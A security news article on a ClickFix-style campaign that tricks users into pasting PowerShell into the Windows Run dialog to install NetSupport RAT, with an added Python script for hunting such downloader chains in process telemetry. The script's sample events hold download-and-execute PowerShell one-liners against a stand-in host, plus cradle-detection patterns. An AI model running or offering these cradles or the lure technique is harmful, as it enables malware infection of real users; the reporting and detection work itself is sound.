Threat hunters are alerting to a new campaign that tricks users into visiting fake websites in order to run malicious PowerShell scripts that infect their machines with NetSupport RAT.
The DomainTools Investigations (DTI) team said it identified “malicious multi-stage downloader PowerShell scripts” hosted on websites masquerading as Gitcode and DocuSign.
“These sites attempt to trick users into copying and running an initial PowerShell script from the Windows Run command,” the company said in a technical report shared with The Hacker News.
“When doing so, the PowerShell script downloads another downloader script and executes it on the system, which in turn retrieves additional payloads and executes them to install NetSupport RAT on the infected machine.”
It is believed that these fake sites may be promoted through email and social engineering efforts on social media platforms.
The PowerShell script hosted on the fake Gitcode sites is designed to download a series of intermediate PowerShell scripts from an external server (“tradingwitool[.]com”), which are used in succession to launch NetSupport RAT on compromised machines.
DomainTools said it has also identified a number of other websites (…[.]com) distributing the same remote access trojan, but with a twist: a ClickFix-style CAPTCHA verification that gets victims to run the malicious PowerShell scripts themselves.
Like the recently documented attack chain distributing the EDDIESTEALER infostealer, users landing on these pages are asked to prove they are not robots by completing a check.
Triggering the CAPTCHA verification silently copies an obfuscated PowerShell command to the user’s clipboard (a technique called clipboard poisoning), after which they are instructed to open the Windows Run dialog (Win + R), paste (Ctrl + V) and press Enter, which causes the command to be executed.
The PowerShell script works by downloading a persistence script (“wbdims.exe”) from GitHub to ensure that the payload is automatically launched whenever the user logs in to the system.
“While this payload was no longer available at the time of the investigation, it is presumed that it checks in with the delivery site via document[.]com/verification/c.php,” DomainTools said. “When doing so, it triggers a browser refresh for the page …[.]com/verification/s.php?a=1.”
This results in the delivery of another PowerShell script, which in turn downloads and executes a third-stage ZIP archive from the same server by setting the URL parameter “a” to 2. The script proceeds to unpack the archive and run an executable, “jp2launcher.exe”, ultimately leading to the deployment of NetSupport RAT.
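As an added example (this is not code from the DomainTools report or from the article), the following Python sketch implements the two checks a hunter would run against process-creation telemetry (Sysmon Event ID 1 or equivalent) to catch the ClickFix step described above and the multi-stage downloader chain: PowerShell spawned directly by explorer.exe, which is what a command pasted into the Run dialog looks like, carrying a download cradle or console-hiding flags; and a process whose ancestry is a run of PowerShell downloaders, typically ending in a non-PowerShell executable such as the unpacked jp2launcher.exe. The event records, PIDs, image paths, the example.invalid host and the ProcEvent field names are constructed for the example; only the endpoint names and jp2launcher.exe come from the article.

```python
"""Hunting ClickFix-style PowerShell downloader chains in process-creation telemetry.

Added example: the events below are constructed, not taken from the DomainTools report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1-style record (field names are an assumption)."""
    pid: int
    ppid: int
    image: str      # full path of the started process
    cmdline: str    # its command line


POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-cradle and execution primitives used by staged PowerShell downloaders.
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|frombase64string|"
    r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,})",
    re.IGNORECASE,
)
# Flags that hide the console or bypass policy, typical of a one-liner pasted into Win+R.
STEALTH_RE = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-no(?:p|profile)\b)",
    re.IGNORECASE,
)

# Constructed sample telemetry mirroring the chain described in the article
# (explorer -> pasted PowerShell -> second-stage PowerShell -> jp2launcher.exe),
# plus two benign controls. example.invalid stands in for the real delivery host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2001, 1000, PS,
              'powershell -w hidden -ep bypass -c "iwr https://example.invalid/verification/c.php | iex"'),
    ProcEvent(2002, 2001, PS,
              "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadString('https://example.invalid/verification/s.php?a=2') | iex\""),
    ProcEvent(2003, 2002, r"C:\Users\victim\AppData\Local\Temp\pkg\jp2launcher.exe", "jp2launcher.exe"),
    ProcEvent(2004, 1000, PS, "powershell"),                 # user opened PowerShell via Run
    ProcEvent(3001, 2500, PS, "powershell -c Get-Process"),  # admin at a terminal
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_downloader(e: ProcEvent) -> bool:
    """PowerShell whose command line contains a download/execute primitive."""
    return basename(e.image) in POWERSHELL and bool(CRADLE_RE.search(e.cmdline))


def find_clickfix(events: List[ProcEvent]) -> List[int]:
    """PIDs of PowerShell started straight from explorer.exe (Run dialog) with cradle or stealth flags."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if (basename(e.image) in POWERSHELL and parent is not None
                and basename(parent.image) == "explorer.exe"
                and (CRADLE_RE.search(e.cmdline) or STEALTH_RE.search(e.cmdline))):
            hits.append(e.pid)
    return hits


def ancestry(e: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """The process and its ancestors, leaf first; stops at unknown parents or PID-reuse loops."""
    chain, seen = [e], {e.pid}
    while e.ppid in by_pid and e.ppid not in seen:
        e = by_pid[e.ppid]
        seen.add(e.pid)
        chain.append(e)
    return chain


def find_staged_chains(events: List[ProcEvent], min_stages: int = 2) -> List[Tuple[int, List[int]]]:
    """(pid, [downloader PIDs nearest-first]) for the deepest process of each chain of at least
    min_stages consecutive PowerShell downloaders: a script that downloads a script that downloads more."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[int]] = {}
    for e in events:
        stages = []
        for node in ancestry(e, by_pid):
            if is_downloader(node):
                stages.append(node.pid)
            elif node is e:
                continue   # a non-PowerShell leaf (the dropped payload) still counts
            else:
                break      # chain broken by a non-downloader ancestor
        if len(stages) >= min_stages:
            hits[e.pid] = stages
    # Report each chain once, at its deepest process: drop hits that sit inside another hit's chain.
    inner = {p for pid, stages in hits.items() for p in stages if p != pid}
    return sorted((pid, stages) for pid, stages in hits.items() if pid not in inner)


if __name__ == "__main__":
    print("ClickFix launches:", find_clickfix(SAMPLE_EVENTS))
    print("Staged chains:", find_staged_chains(SAMPLE_EVENTS))
```

Both functions return PIDs rather than printing, so the results can be fed into enrichment or case creation; the two benign controls (a user opening a bare PowerShell from Run, an admin running Get-Process from a terminal) are not flagged, and a chain that has not yet dropped its final payload is still reported at its deepest PowerShell stage. To recover the exact one-liner the victim pasted, also pull the Run dialog history from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which explorer.exe keeps independently of PowerShell logging.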
“Downloading multiple stages of scripts, and running scripts that in turn download and run more scripts, is probably intended to be more resilient against detection, security checks and takedowns,” the company said.
It is not currently clear who is behind the campaign, but DomainTools said it identified the same delivery URL, domain naming and registration patterns in connection with a SocGholish (aka FakeUpdates) campaign in October 2024.
“Notably, the techniques involved are common, and NetSupport Manager is a legitimate remote administration tool known to be used as a RAT by many threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, and others.”